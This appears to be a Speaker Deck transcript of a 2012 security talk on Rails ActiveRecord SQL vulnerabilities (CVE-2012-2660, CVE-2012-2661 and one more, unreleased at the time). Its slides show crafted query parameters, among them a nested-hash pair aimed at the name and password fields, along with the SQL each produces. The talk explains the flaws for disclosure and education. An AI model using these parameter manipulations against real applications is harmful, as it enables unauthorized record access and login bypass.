Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
60
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
120
The Evolution of Rails Security
presidentbeef
1
700
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
110
Practical Static Analysis for Continuous Application Security
presidentbeef
0
160
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
340
Continuous Security with Practical Static Analysis
presidentbeef
1
260
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
170
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.1k
Tales from the Crypt
presidentbeef
1
170
Other Decks in Programming
See All in Programming
From Spring Boot 2 to Spring Boot 3 with Java 22 and Jakarta EE
ivargrimstad
0
1.9k
Product Management LT会_クアンド新家
shinshin
0
260
The rollercoaster of releasing an Android, iOS, and macOS app with Kotlin Multiplatform | droidcon Berlin
prof18
0
110
大規模マルチテナントを解決するYugabyteDBという選択肢
nnaka2992
1
250
ピグパーティにおけるMongoDB CommunityバージョンからAtlasへの移行事例
10969hotaka
0
130
TiDB Serverless ~理想のServerless DBを考える~
soso_15315
1
160
Polarsの成長: v0.14からv1.0までの変遷と今後の展望
zerebom
1
350
リハビリmruby
kishima
1
160
入社1ヶ月でここまでやった!Findy Toolsインフラ支援の最適化
rvirus0817
6
1.4k
Terraformテスト入門
msato
0
540
DMMプラットフォームにおけるTiDBの導入から運用まで
pospome
7
3k
SRE チーム立ち上げ前に考えたこと・取り組んだこと / Considerations and Preparations Before Establishing an SRE Team
mackey0225
3
320
Featured
See All Featured
ParisWeb 2013: Learning to Love: Crash Course in Emotional UX Design
dotmariusz
105
6.8k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
90
47k
Leading Effective Engineering Teams 2024
addyosmani
3
300
Why You Should Never Use an ORM
jnunemaker
PRO
51
8.9k
KATA
mclloyd
20
13k
Imperfection Machines: The Place of Print at Facebook
scottboms
262
13k
The World Runs on Bad Software
bkeepers
PRO
63
11k
Design by the Numbers
sachag
277
18k
No one is an island. Learnings from fostering a developers community.
thoeni
17
2.8k
Teambox: Starting and Learning
jrom
130
8.6k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
149
45k
Fantastic passwords and where to find them - at NoRuKo
philnash
42
2.7k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1